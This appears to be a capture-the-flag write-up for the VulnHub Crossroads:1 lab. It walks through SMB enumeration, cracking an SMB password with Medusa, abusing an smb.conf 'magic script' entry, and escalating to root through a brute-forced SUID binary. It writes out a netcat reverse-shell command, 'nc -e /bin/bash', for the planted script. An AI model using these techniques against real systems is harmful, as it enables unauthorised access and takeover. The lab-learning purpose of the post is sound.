VulnHub Crossroads:1 is an easy level boot2root CTF challenge where you have to exploit SMB and obtain user and root access.
Let us begin with finding the IP of the VM.
Then let’s perform a traditional Nmap scan.
You will come across 3 open ports,
- Port 80 - HTTP
- Port 139 - SMB
- Port 445 - SMB
Web application is not a place where you get lucky. I tried different attacks such as SQL injection on Login and Signup forms, but it was not successful.
Then I tried brute forcing directories.
I could find 2 hidden directories,
Let’s take a look at robots.txt.
It points out another hidden file called crossroads.png, so let’s take a look at that image.
It seems useless. So let’s take a look at the note.txt.
It talks about 3 kings of blues. I did not know what that means, so I Googled it and found the following.
Those names may be a hint on the usernames associated with our machine.
As web application was useless, let us enumerate SMB shares with enum4linux.
We can find one of the 3 kings of blues; Albert 🙂
Then I tried to crack the password of SMB share of albert.
Using Hydra was a nightmare as the estimated time was about 40 hours. So, I used Medusa.
Less than a minute I could find the password of albert as bradley1.
So, let’s go ahead and login to the SMB share, using above credentials.
We can come across 3 files and a directory called smbshare.
Let’s download those 3 files using get command.
Change directory to smbshare and download smb.conf file.
As for now we have 4 files,
Let’s examine the downloaded content one by one.
user.txt contains the first flag.
When we examine the smb.conf file, we can come across the following entries.
There is an entry called magic script = smbscript.sh.
We can crate a shell script called smbscript so that gives us a reverse connection to the machine.
Just add nc -e /bin/bash <host IP> <host port> in the shell script, which results in a netcat reverse shell when executed.
Give read , write , executable permissions for all users to the script.
Then set up a netcat listener.
Magic script should be executed in smbshare. So, let’s login to smbshare as albert and upload our smbscript.sh file using put command.
Take a look at the netcat listener. We are given a reverse shell.
We need to make the received dumb shell stable. You can follow these instructions.
If we take a look at the SUID binaries, we can see that beroot file can be run as root.
Let’s take a look at beroot file.
We can clearly understand that it can be used to become root. So, let’s go ahead and run this file.
It asks for a password which we don’t know.
As for now we have examined 3 files from the downloaded content from the SMB share. Only the image crossroads.png is left to look into. As this is an image, stenography may be involved. We can use a tool such as stegoveritas to examine our image.
After scanning, it makes a new directory called results. There’s another directory called keepers inside it. If we take a look at the first file, we can come across that it is a word list. We can give it a try to crack the password of beroot file.
Let’s copy it as passwrds.txt to the home directory.
Let’s create a simple http server using python in order to upload our file to the victim.
We can use wget in the victim to upload the passwrds.txt file.
Now we can write a simple bash script in order to go through our list of passwords and brute force the password of beroot.
Provide execute permissions to the script (chmod +x) and execute it.
Once it is completed we are given another file called rootcreds.
We can obtain the credentials for root by viewing that file.
Let’s go ahead and change user to root, providing above credentials.
VOILA!!! We are root!!!
We can obtain the second flag from the home directory of root.
I hope you enjoyed the challenge, as well as learnt something. Connect me via LinkedIn.
Best of luck in capturing flags ahead!!!